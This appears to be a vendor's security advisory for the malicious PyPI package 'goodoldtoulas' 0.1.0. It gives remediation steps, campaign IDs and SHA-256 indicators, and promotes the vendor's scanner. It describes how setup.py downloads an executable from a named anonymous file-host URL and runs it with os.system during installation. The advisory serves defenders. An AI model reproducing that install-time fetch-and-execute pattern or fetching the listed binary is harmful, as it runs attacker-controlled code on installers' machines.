Which versions of goodoldtoulas are malicious?

The following PyPI versions of goodoldtoulas are flagged malicious: 0.1.0. Treat any of these as compromised.

How do I remediate goodoldtoulas if I installed it?

Remove goodoldtoulas from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is goodoldtoulas part of a known attack campaign?

Yes — goodoldtoulas is associated with the 2026-06-goodoldtoulas, IN-MAL-2026-005259, IN-MAL-2026-005258 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect goodoldtoulas in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking goodoldtoulas and packages like it before any post-install script runs.

Malicious package

goodoldtoulasPyPI

Malicious code in goodoldtoulas (PyPI) Remove it immediately and rotate any exposed credentials.

MAL-2026-5271

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

pip uninstall goodoldtoulas

What this malware does

During pip install goodoldtoulas, setup.py invokes setup_helper() which downloads main.exe from https://cold-eu-par-1.gofile.io/download/web/deb39e07-da2d-4081-a86b-6380e555788c/main.exe (anonymous file host) into C:\MALWARE_DELETE and executes it via os.system('main.exe') (setup.py lines 6, 21, 33). The fetch is unpinned, has no hash verification, the destination is an opaque Windows binary, the host is not the publisher's domain, and the staging path name is self-incriminating. Any installer running pip install of this package on Windows fetches and executes an attacker-controlled binary at install time.

During installation, package attempts to download and run an executable imitating malicious activity.

Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.

Campaign: 2026-06-goodoldtoulas

Reasons (based on the campaign):

The package overrides the install command in setup.py to execute malicious code during installation.
Downloads and executes a remote executable.

Malicious versions

1 flagged

0.1.0

Indicators of compromise (SHA-256)

24dbb5643933ff305b2eab164e820476f645ef2b59ad7c7cdfdeb2c3c3bfb98f

463564954b6a05239e3161ff46d10a0ad605c36ec4c7bda57c08db53e4044c3d

5414e9956c915ef34d422d9eba09177fb667bba375c43e9d9b54d4f87b628712

Frequently asked questions

No. goodoldtoulas on PyPI has been identified as a malicious package (version 0.1.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

2026-06-goodoldtoulasIN-MAL-2026-005259IN-MAL-2026-005258

References

Credits

Amazon Inspector · finder
Kamil Mańkowski (kam193) · reporter

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection